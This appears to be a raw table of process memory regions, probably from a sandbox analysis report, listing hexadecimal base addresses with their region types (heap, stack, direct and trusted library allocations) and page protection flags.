21E68C00000
|
heap
|
page read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
21E68110000
|
heap
|
page read and write
|
||
236AFBB5000
|
heap
|
page read and write
|
||
4114D7D000
|
stack
|
page read and write
|
||
BB8E7FE000
|
stack
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
23F504E0000
|
trusted library allocation
|
page read and write
|
||
20A54300000
|
heap
|
page read and write
|
||
4114E4E000
|
stack
|
page read and write
|
||
236AFB6C000
|
heap
|
page read and write
|
||
236B1790000
|
heap
|
page execute and read and write
|
||
20A540C3000
|
heap
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
7FFAAC6E4000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2E7C7AD0000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2EE2C050000
|
direct allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
C000136000
|
direct allocation
|
page read and write
|
||
236B53BE000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
21666158000
|
heap
|
page read and write
|
||
2B3C1317000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
2EE2BF70000
|
direct allocation
|
page read and write
|
||
2B3D7A50000
|
trusted library allocation
|
page read and write
|
||
2EE28585000
|
heap
|
page read and write
|
||
7FFAAC870000
|
trusted library allocation
|
page read and write
|
||
2EE28520000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
1DF1C210000
|
direct allocation
|
page read and write
|
||
2EE285C1000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
21E68AD8000
|
heap
|
page read and write
|
||
1A3B3ECA000
|
heap
|
page read and write
|
||
7FFAAC850000
|
trusted library allocation
|
page read and write
|
||
C000106000
|
direct allocation
|
page read and write
|
||
AD6B57C000
|
stack
|
page read and write
|
||
7FFAAC968000
|
trusted library allocation
|
page read and write
|
||
2B3D85C0000
|
heap
|
page read and write
|
||
2EE2858A000
|
heap
|
page read and write
|
||
C000031000
|
direct allocation
|
page read and write
|
||
21E67EAE000
|
heap
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
23F506C0000
|
heap
|
page read and write
|
||
260880D000
|
stack
|
page read and write
|
||
7FFAAC3ED000
|
trusted library allocation
|
page execute and read and write
|
||
21E68AEA000
|
heap
|
page read and write
|
||
21E68420000
|
heap
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F4B802000
|
heap
|
page read and write
|
||
21E6899F000
|
heap
|
page read and write
|
||
BB8EF7E000
|
stack
|
page read and write
|
||
1DF1D6FB000
|
unclassified section
|
page write copy
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F5064A000
|
heap
|
page read and write
|
||
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
AD6C97E000
|
unkown
|
page readonly
|
||
21E68AFB000
|
heap
|
page read and write
|
||
21666165000
|
heap
|
page read and write
|
||
1A3B3E99000
|
heap
|
page read and write
|
||
2B3BE166000
|
heap
|
page read and write
|
||
23F50641000
|
heap
|
page read and write
|
||
1DF1C016000
|
heap
|
page read and write
|
||
20A569DC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC859000
|
trusted library allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
AD6C3FE000
|
stack
|
page read and write
|
||
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
7FFAAC510000
|
trusted library allocation
|
page execute and read and write
|
||
236B1AC6000
|
trusted library allocation
|
page read and write
|
||
236B45C4000
|
trusted library allocation
|
page read and write
|
||
236B4658000
|
trusted library allocation
|
page read and write
|
||
2EE28594000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
2EE2C030000
|
direct allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
260787E000
|
stack
|
page read and write
|
||
21E68A80000
|
heap
|
page read and write
|
||
2E7C7C14000
|
heap
|
page read and write
|
||
236B40F4000
|
trusted library allocation
|
page read and write
|
||
1DF1D6BE000
|
unclassified section
|
page write copy
|
||
C0001B4000
|
direct allocation
|
page read and write
|
||
F8C17FF000
|
stack
|
page read and write
|
||
21E68A1D000
|
heap
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
1DF1C190000
|
direct allocation
|
page read and write
|
||
C0000DE000
|
direct allocation
|
page read and write
|
||
FD7844E000
|
stack
|
page read and write
|
||
2EE2BD90000
|
direct allocation
|
page read and write
|
||
1C828250000
|
heap
|
page read and write
|
||
2B3BE0A0000
|
heap
|
page read and write
|
||
1DF1C790000
|
direct allocation
|
page read and write
|
||
1DF1BEA5000
|
heap
|
page read and write
|
||
21E68452000
|
heap
|
page read and write
|
||
23F4B800000
|
heap
|
page read and write
|
||
21E6845E000
|
heap
|
page read and write
|
||
23F4B000000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
23F4BFC0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
23F4B09E000
|
heap
|
page read and write
|
||
21E68BAF000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
20A66448000
|
trusted library allocation
|
page read and write
|
||
2B3D8110000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
2B3D8600000
|
heap
|
page read and write
|
||
7067C7E000
|
stack
|
page read and write
|
||
21E68A60000
|
heap
|
page read and write
|
||
236B1420000
|
trusted library section
|
page read and write
|
||
2B3BDF20000
|
heap
|
page read and write
|
||
236B465B000
|
trusted library allocation
|
page read and write
|
||
4115187000
|
stack
|
page read and write
|
||
236B3737000
|
trusted library allocation
|
page read and write
|
||
21E6844C000
|
heap
|
page read and write
|
||
A9F7B5D000
|
stack
|
page read and write
|
||
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
21E6843C000
|
heap
|
page read and write
|
||
2EE2A170000
|
heap
|
page read and write
|
||
23F506D7000
|
heap
|
page read and write
|
||
21E68A98000
|
heap
|
page read and write
|
||
21E689C9000
|
heap
|
page read and write
|
||
2B3D829E000
|
heap
|
page read and write
|
||
20A6E24A000
|
heap
|
page read and write
|
||
20A5688A000
|
trusted library allocation
|
page read and write
|
||
C000209000
|
direct allocation
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
236B4D6C000
|
trusted library allocation
|
page read and write
|
||
236B31E3000
|
trusted library allocation
|
page read and write
|
||
21E683F0000
|
heap
|
page read and write
|
||
23F4B0FF000
|
heap
|
page read and write
|
||
2B3BE0FB000
|
heap
|
page read and write
|
||
C000038000
|
direct allocation
|
page read and write
|
||
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
236B1480000
|
trusted library allocation
|
page read and write
|
||
21E68B04000
|
heap
|
page read and write
|
||
411427D000
|
stack
|
page read and write
|
||
2B3D7F44000
|
heap
|
page read and write
|
||
70681BE000
|
stack
|
page read and write
|
||
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
236B1460000
|
trusted library allocation
|
page read and write
|
||
21E68438000
|
heap
|
page read and write
|
||
7FFAAC5A0000
|
trusted library allocation
|
page execute and read and write
|
||
C000144000
|
direct allocation
|
page read and write
|
||
C000214000
|
direct allocation
|
page read and write
|
||
1DF1C200000
|
direct allocation
|
page read and write
|
||
23F4B900000
|
heap
|
page read and write
|
||
21E68A98000
|
heap
|
page read and write
|
||
2EE28612000
|
heap
|
page read and write
|
||
21E68AA5000
|
heap
|
page read and write
|
||
2B3BE0DB000
|
heap
|
page read and write
|
||
7FFAAC900000
|
trusted library allocation
|
page read and write
|
||
2166617A000
|
heap
|
page read and write
|
||
1DF13ACC000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
2B3CFA21000
|
trusted library allocation
|
page read and write
|
||
1DF62D10000
|
direct allocation
|
page read and write
|
||
21E6AC46000
|
heap
|
page read and write
|
||
21E68B6F000
|
heap
|
page read and write
|
||
7FFAAC49C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC3E2000
|
trusted library allocation
|
page read and write
|
||
7067FBF000
|
stack
|
page read and write
|
||
2166617A000
|
heap
|
page read and write
|
||
21E68B95000
|
heap
|
page read and write
|
||
23F506D5000
|
heap
|
page read and write
|
||
21E68B5D000
|
heap
|
page read and write
|
||
C0003F4000
|
direct allocation
|
page read and write
|
||
1DF03DAE000
|
trusted library allocation
|
page read and write
|
||
1DF1C03F000
|
heap
|
page read and write
|
||
41143FB000
|
stack
|
page read and write
|
||
21E67EA9000
|
heap
|
page read and write
|
||
7FFAAC910000
|
trusted library allocation
|
page read and write
|
||
21666195000
|
heap
|
page read and write
|
||
2B3C0D64000
|
trusted library allocation
|
page read and write
|
||
2B3BFAAA000
|
trusted library allocation
|
page read and write
|
||
20A6E367000
|
heap
|
page read and write
|
||
23F506C2000
|
heap
|
page read and write
|
||
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6C0000
|
trusted library allocation
|
page execute and read and write
|
||
216662E0000
|
heap
|
page read and write
|
||
C000228000
|
direct allocation
|
page read and write
|
||
7DF453CA0000
|
trusted library allocation
|
page execute and read and write
|
||
1DF1DA98000
|
unclassified section
|
page readonly
|
||
21E68BF8000
|
heap
|
page read and write
|
||
2B3C103F000
|
trusted library allocation
|
page read and write
|
||
20A542B0000
|
trusted library allocation
|
page read and write
|
||
21E68944000
|
heap
|
page read and write
|
||
23F4BEA1000
|
trusted library allocation
|
page read and write
|
||
21E67E94000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
C000094000
|
direct allocation
|
page read and write
|
||
23F4B08D000
|
heap
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
2607ABA000
|
stack
|
page read and write
|
||
2B3D7A9A000
|
heap
|
page read and write
|
||
7FFAAC5E6000
|
trusted library allocation
|
page execute and read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
1DF1BDE9000
|
heap
|
page read and write
|
||
AD6BE7E000
|
unkown
|
page readonly
|
||
20A5410C000
|
heap
|
page read and write
|
||
2EE2C090000
|
direct allocation
|
page read and write
|
||
20A57EA4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3F2000
|
trusted library allocation
|
page read and write
|
||
C000466000
|
direct allocation
|
page read and write
|
||
23F50860000
|
remote allocation
|
page read and write
|
||
7FFAAC8F3000
|
trusted library allocation
|
page read and write
|
||
236B4644000
|
trusted library allocation
|
page read and write
|
||
2B3D8573000
|
heap
|
page read and write
|
||
7FFB1E3A1000
|
unkown
|
page execute read
|
||
1A3B3DB0000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F50860000
|
remote allocation
|
page read and write
|
||
1A3B3DC0000
|
heap
|
page read and write
|
||
C000456000
|
direct allocation
|
page read and write
|
||
20A6E49A000
|
heap
|
page read and write
|
||
23F50860000
|
remote allocation
|
page read and write
|
||
21666151000
|
heap
|
page read and write
|
||
20A6E46D000
|
heap
|
page read and write
|
||
21E6AC49000
|
heap
|
page read and write
|
||
1DF0383D000
|
heap
|
page read and write
|
||
2A802254000
|
heap
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
236AFBB3000
|
heap
|
page read and write
|
||
20A6E150000
|
heap
|
page read and write
|
||
21666175000
|
heap
|
page read and write
|
||
21E68B66000
|
heap
|
page read and write
|
||
AD6BA7E000
|
unkown
|
page readonly
|
||
4114F0E000
|
stack
|
page read and write
|
||
1F2C7C30000
|
heap
|
page read and write
|
||
236B45AE000
|
trusted library allocation
|
page read and write
|
||
1DF1D6C2000
|
unclassified section
|
page read and write
|
||
2B3BE1E6000
|
heap
|
page read and write
|
||
21E68420000
|
heap
|
page read and write
|
||
21E689CB000
|
heap
|
page read and write
|
||
C000150000
|
direct allocation
|
page read and write
|
||
236B15B9000
|
heap
|
page read and write
|
||
1F2C7DAB000
|
heap
|
page read and write
|
||
236B459A000
|
trusted library allocation
|
page read and write
|
||
2B3D8001000
|
heap
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
236B14F0000
|
trusted library allocation
|
page read and write
|
||
2B3C1049000
|
trusted library allocation
|
page read and write
|
||
1DF1C194000
|
direct allocation
|
page read and write
|
||
21E68A20000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
C00020F000
|
direct allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
20A55B57000
|
heap
|
page execute and read and write
|
||
1DF1BF80000
|
heap
|
page read and write
|
||
C000223000
|
direct allocation
|
page read and write
|
||
1F2C7D10000
|
heap
|
page read and write
|
||
2EE285D4000
|
heap
|
page read and write
|
||
21E68BBF000
|
heap
|
page read and write
|
||
7FFAAC86C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5D0000
|
trusted library allocation
|
page execute and read and write
|
||
C00020D000
|
direct allocation
|
page read and write
|
||
2B3D81FC000
|
heap
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
1DF62CB1000
|
direct allocation
|
page read and write
|
||
1A3B3E99000
|
heap
|
page read and write
|
||
21E68987000
|
heap
|
page read and write
|
||
216661E2000
|
heap
|
page read and write
|
||
C000062000
|
direct allocation
|
page read and write
|
||
20A66163000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
20A55B90000
|
heap
|
page read and write
|
||
1DF03E1E000
|
trusted library allocation
|
page read and write
|
||
2EE284F0000
|
heap
|
page read and write
|
||
1A3B3E87000
|
heap
|
page read and write
|
||
1A3B3E8A000
|
heap
|
page read and write
|
||
2EE285FB000
|
heap
|
page read and write
|
||
E339E7C000
|
stack
|
page read and write
|
||
236B4640000
|
trusted library allocation
|
page read and write
|
||
1F2C7DA8000
|
heap
|
page read and write
|
||
260878E000
|
stack
|
page read and write
|
||
20A6E3B7000
|
heap
|
page read and write
|
||
216661C6000
|
heap
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
21E68BAA000
|
heap
|
page read and write
|
||
1DF13A61000
|
trusted library allocation
|
page read and write
|
||
21E6AC49000
|
heap
|
page read and write
|
||
2EE28613000
|
heap
|
page read and write
|
||
216661B6000
|
heap
|
page read and write
|
||
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
BB8EA7E000
|
stack
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
AD6C6FE000
|
unkown
|
page readonly
|
||
21667AC0000
|
trusted library allocation
|
page read and write
|
||
2EE2BFF0000
|
direct allocation
|
page read and write
|
||
21E6AC56000
|
heap
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
1DF1DA9D000
|
unclassified section
|
page readonly
|
||
23F50440000
|
trusted library allocation
|
page read and write
|
||
AD6BD7E000
|
unkown
|
page readonly
|
||
21E68C1B000
|
heap
|
page read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
216661FF000
|
heap
|
page read and write
|
||
21E68B04000
|
heap
|
page read and write
|
||
21E68C0C000
|
heap
|
page read and write
|
||
236B4674000
|
trusted library allocation
|
page read and write
|
||
21E68A9B000
|
heap
|
page read and write
|
||
C0003F6000
|
direct allocation
|
page read and write
|
||
AD6CA7E000
|
stack
|
page read and write
|
||
2B3CFD0B000
|
trusted library allocation
|
page read and write
|
||
C000058000
|
direct allocation
|
page read and write
|
||
1DF62D79000
|
direct allocation
|
page read and write
|
||
2B3D81F0000
|
heap
|
page read and write
|
||
21E68444000
|
heap
|
page read and write
|
||
236B41EA000
|
trusted library allocation
|
page read and write
|
||
C0000BA000
|
direct allocation
|
page read and write
|
||
6FB79D4000
|
stack
|
page read and write
|
||
4115488000
|
stack
|
page read and write
|
||
C0000A4000
|
direct allocation
|
page read and write
|
||
1DF1D6C0000
|
unclassified section
|
page write copy
|
||
BB8FC4D000
|
stack
|
page read and write
|
||
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
2EE28593000
|
heap
|
page read and write
|
||
21E68A1D000
|
heap
|
page read and write
|
||
A9F7BDF000
|
stack
|
page read and write
|
||
1DF01CA4000
|
heap
|
page read and write
|
||
1DF1DA90000
|
unclassified section
|
page read and write
|
||
C00022A000
|
direct allocation
|
page read and write
|
||
1DF01E70000
|
heap
|
page read and write
|
||
1F2C7F94000
|
heap
|
page read and write
|
||
BB8E7BE000
|
unkown
|
page read and write
|
||
20A66440000
|
trusted library allocation
|
page read and write
|
||
21E68A10000
|
heap
|
page read and write
|
||
7FFAAC930000
|
trusted library allocation
|
page execute and read and write
|
||
2B3BE0E9000
|
heap
|
page read and write
|
||
1DF03796000
|
heap
|
page execute and read and write
|
||
21E6845E000
|
heap
|
page read and write
|
||
1C828258000
|
heap
|
page read and write
|
||
7FFAAC6E2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5D5000
|
trusted library allocation
|
page read and write
|
||
21E68A9E000
|
heap
|
page read and write
|
||
21E6844C000
|
heap
|
page read and write
|
||
23F506C7000
|
heap
|
page read and write
|
||
7FFAAC59A000
|
trusted library allocation
|
page read and write
|
||
21E68A04000
|
heap
|
page read and write
|
||
20A6E483000
|
heap
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
20A6643B000
|
trusted library allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
1DF03836000
|
heap
|
page read and write
|
||
1A3B5A00000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
23F504F0000
|
trusted library allocation
|
page read and write
|
||
21E68987000
|
heap
|
page read and write
|
||
2EE285E8000
|
heap
|
page read and write
|
||
26076FE000
|
stack
|
page read and write
|
||
21E68BAE000
|
heap
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
1DF01C9D000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
2608B4E000
|
stack
|
page read and write
|
||
2B3C104D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3F0000
|
trusted library allocation
|
page read and write
|
||
21E6843D000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
23F504C1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC504000
|
trusted library allocation
|
page read and write
|
||
21E68447000
|
heap
|
page read and write
|
||
2EE2858B000
|
heap
|
page read and write
|
||
2B3D7FEA000
|
heap
|
page read and write
|
||
20A6E270000
|
heap
|
page read and write
|
||
21666136000
|
heap
|
page read and write
|
||
21E68B58000
|
heap
|
page read and write
|
||
2EE2C040000
|
direct allocation
|
page read and write
|
||
2608BCD000
|
stack
|
page read and write
|
||
1DF03833000
|
heap
|
page read and write
|
||
20A6E439000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
7FFAAC5C0000
|
trusted library allocation
|
page execute and read and write
|
||
2EE29FA0000
|
heap
|
page read and write
|
||
2EE285DC000
|
heap
|
page read and write
|
||
7FFB1E3B6000
|
unkown
|
page readonly
|
||
21E68B09000
|
heap
|
page read and write
|
||
1DF13AB0000
|
trusted library allocation
|
page read and write
|
||
21E68A3A000
|
heap
|
page read and write
|
||
C000122000
|
direct allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFB1E3BD000
|
unkown
|
page readonly
|
||
20A661C2000
|
trusted library allocation
|
page read and write
|
||
2A801E20000
|
heap
|
page read and write
|
||
23F5070C000
|
heap
|
page read and write
|
||
C000585000
|
direct allocation
|
page read and write
|
||
23F50707000
|
heap
|
page read and write
|
||
C000033000
|
direct allocation
|
page read and write
|
||
260767E000
|
stack
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3F3000
|
trusted library allocation
|
page execute and read and write
|
||
26073FE000
|
stack
|
page read and write
|
||
23F504A0000
|
trusted library allocation
|
page read and write
|
||
21E68C0B000
|
heap
|
page read and write
|
||
AD6CD7E000
|
unkown
|
page readonly
|
||
1DF1C270000
|
heap
|
page read and write
|
||
2EE29F67000
|
direct allocation
|
page read and write
|
||
21E6AC56000
|
heap
|
page read and write
|
||
216660B0000
|
heap
|
page read and write
|
||
216661A9000
|
heap
|
page read and write
|
||
21E6CE50000
|
heap
|
page read and write
|
||
7FFAAC810000
|
trusted library allocation
|
page read and write
|
||
21E68B75000
|
heap
|
page read and write
|
||
1F2C7D30000
|
heap
|
page read and write
|
||
1DF1DA22000
|
unclassified section
|
page read and write
|
||
21E68920000
|
heap
|
page read and write
|
||
21E68A43000
|
heap
|
page read and write
|
||
C00020B000
|
direct allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E689BF000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
7067E79000
|
stack
|
page read and write
|
||
1DF62D13000
|
direct allocation
|
page read and write
|
||
1DF1DA28000
|
unclassified section
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
C0000AC000
|
direct allocation
|
page read and write
|
||
236B14B0000
|
trusted library allocation
|
page read and write
|
||
FD7874B000
|
stack
|
page read and write
|
||
21E6843F000
|
heap
|
page read and write
|
||
236B3B41000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
23F4AF00000
|
heap
|
page read and write
|
||
21E6AC4F000
|
heap
|
page read and write
|
||
411528E000
|
stack
|
page read and write
|
||
E339F7F000
|
stack
|
page read and write
|
||
2C388DE4000
|
heap
|
page read and write
|
||
1DF1DA99000
|
unclassified section
|
page write copy
|
||
21E68C02000
|
heap
|
page read and write
|
||
7FFAAC6B1000
|
trusted library allocation
|
page read and write
|
||
1F2C7DA0000
|
heap
|
page read and write
|
||
23F4B902000
|
heap
|
page read and write
|
||
216661C6000
|
heap
|
page read and write
|
||
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
20A55AE0000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
C0001BE000
|
direct allocation
|
page read and write
|
||
2EE285F1000
|
heap
|
page read and write
|
||
21E6845E000
|
heap
|
page read and write
|
||
C000132000
|
direct allocation
|
page read and write
|
||
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
4113D7F000
|
stack
|
page read and write
|
||
2B3BE1E0000
|
heap
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
4113CFD000
|
stack
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
23F4C0F0000
|
trusted library section
|
page readonly
|
||
1DF03DBD000
|
trusted library allocation
|
page read and write
|
||
2B3D7F30000
|
heap
|
page read and write
|
||
2B3BE1E3000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
2EE28564000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
2B3BE1D0000
|
heap
|
page readonly
|
||
21E68AB6000
|
heap
|
page read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3C2000
|
unkown
|
page readonly
|
||
1DF036C0000
|
trusted library allocation
|
page read and write
|
||
1DF1BEA0000
|
heap
|
page read and write
|
||
2166620E000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
1DF03DC1000
|
trusted library allocation
|
page read and write
|
||
1DF03AC6000
|
trusted library allocation
|
page read and write
|
||
1DF01D3C000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
C000056000
|
direct allocation
|
page read and write
|
||
23F4B91A000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
216661C6000
|
heap
|
page read and write
|
||
7FFAAC4AC000
|
trusted library allocation
|
page execute and read and write
|
||
21E68ADB000
|
heap
|
page read and write
|
||
BB8FBCD000
|
stack
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
21E68BBB000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
20A540C7000
|
heap
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
1DF03830000
|
heap
|
page read and write
|
||
216661E7000
|
heap
|
page read and write
|
||
C000051000
|
direct allocation
|
page read and write
|
||
C00014E000
|
direct allocation
|
page read and write
|
||
26077FE000
|
stack
|
page read and write
|
||
21E689AC000
|
heap
|
page read and write
|
||
AD6BAFE000
|
stack
|
page read and write
|
||
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
C0004C8000
|
direct allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F505A0000
|
trusted library allocation
|
page read and write
|
||
23F4B815000
|
heap
|
page read and write
|
||
2EE2A173000
|
heap
|
page read and write
|
||
26088CF000
|
stack
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
706794E000
|
stack
|
page read and write
|
||
21E6CE43000
|
heap
|
page read and write
|
||
236AFDE0000
|
heap
|
page read and write
|
||
21E68AAC000
|
heap
|
page read and write
|
||
236B1440000
|
trusted library allocation
|
page read and write
|
||
1DF1D6FA000
|
unclassified section
|
page read and write
|
||
23F4B05B000
|
heap
|
page read and write
|
||
C0003EA000
|
direct allocation
|
page read and write
|
||
21E68240000
|
heap
|
page read and write
|
||
21E68AEF000
|
heap
|
page read and write
|
||
21E6845F000
|
heap
|
page read and write
|
||
23F4AFE0000
|
heap
|
page read and write
|
||
23F4B013000
|
heap
|
page read and write
|
||
21E689C7000
|
heap
|
page read and write
|
||
20A6E690000
|
heap
|
page read and write
|
||
21E6AC56000
|
heap
|
page read and write
|
||
1DF036E0000
|
trusted library allocation
|
page read and write
|
||
21666179000
|
heap
|
page read and write
|
||
3277C7E000
|
stack
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
6FB79CD000
|
stack
|
page read and write
|
||
7FFAAC5BC000
|
trusted library allocation
|
page execute and read and write
|
||
C000126000
|
direct allocation
|
page read and write
|
||
1DF1C180000
|
direct allocation
|
page read and write
|
||
7FFAAC40B000
|
trusted library allocation
|
page read and write
|
||
AD6B27E000
|
unkown
|
page readonly
|
||
C0000D2000
|
direct allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
23F4B780000
|
trusted library section
|
page read and write
|
||
C000430000
|
direct allocation
|
page read and write
|
||
1DF03A00000
|
heap
|
page execute and read and write
|
||
AD6AB8B000
|
stack
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2E7C78F9000
|
heap
|
page read and write
|
||
23F504F0000
|
trusted library allocation
|
page read and write
|
||
2EE28734000
|
heap
|
page read and write
|
||
236AFB10000
|
heap
|
page read and write
|
||
2EE2BF10000
|
direct allocation
|
page read and write
|
||
20A57EC3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4A0000
|
trusted library allocation
|
page execute and read and write
|
||
216661B9000
|
heap
|
page read and write
|
||
2B3CFA90000
|
trusted library allocation
|
page read and write
|
||
1DF62D7C000
|
direct allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
2B3D8208000
|
heap
|
page read and write
|
||
1DF1C05B000
|
heap
|
page read and write
|
||
7DF490030000
|
trusted library allocation
|
page execute and read and write
|
||
2607D3B000
|
stack
|
page read and write
|
||
6FB79DE000
|
stack
|
page read and write
|
||
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
2B93FAF000
|
stack
|
page read and write
|
||
2B3BE1A0000
|
trusted library allocation
|
page read and write
|
||
23F4B073000
|
heap
|
page read and write
|
||
C00014A000
|
direct allocation
|
page read and write
|
||
20A6E19A000
|
heap
|
page read and write
|
||
236B1430000
|
trusted library section
|
page read and write
|
||
C000000000
|
direct allocation
|
page read and write
|
||
20A55BF0000
|
heap
|
page execute and read and write
|
||
2EE2856F000
|
heap
|
page read and write
|
||
2608ACC000
|
stack
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
2EE28586000
|
heap
|
page read and write
|
||
23F4BA91000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
4113E7B000
|
stack
|
page read and write
|
||
23F5064E000
|
heap
|
page read and write
|
||
2EE285F4000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
2B3BE0BE000
|
heap
|
page read and write
|
||
FD7854D000
|
stack
|
page read and write
|
||
23F4C0A0000
|
trusted library section
|
page readonly
|
||
21E6CE40000
|
heap
|
page read and write
|
||
1A3B3ECA000
|
heap
|
page read and write
|
||
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
23F50810000
|
trusted library allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
23F5070E000
|
heap
|
page read and write
|
||
236B545F000
|
trusted library allocation
|
page read and write
|
||
